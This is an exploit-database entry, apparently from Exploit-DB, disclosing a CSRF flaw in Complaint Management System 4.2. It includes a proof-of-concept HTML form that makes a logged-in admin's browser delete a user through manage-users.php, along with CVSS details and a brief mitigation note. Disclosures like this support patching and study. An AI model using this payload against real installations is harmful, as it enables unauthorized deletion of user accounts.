Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)

vendor:

Complaint Management System

by:

Besim ALTINOK

7.5

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: Complaint Management System

Affected Version From: v4.2

Affected Version To: v4.2

Patch Exists: NO

Related CWE: N/A

CPE: a:phpgurukul:complaint_management_system:4.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Xampp

2020

Complaint Management System 4.2 – Cross-Site Request Forgery (Delete User)

You can perform CSRF Attack for all the functions. This request performs over the GET request with uid.

Mitigation:

Implementing CSRF protection tokens, using same-site cookies, and validating the HTTP Referer header can help mitigate CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
*************************************************
Detail:

You can perform CSRF Attack for all the functions.

----------------------------------------------

CSRF PoC for Delete User
----------------------------------------------
This request performs over the GET request with uid.
------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/admin/manage-users.php">
<input type="hidden" name="uid" value="4" />
<input type="hidden" name="" value="" />
<input type="hidden" name="action" value="del" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>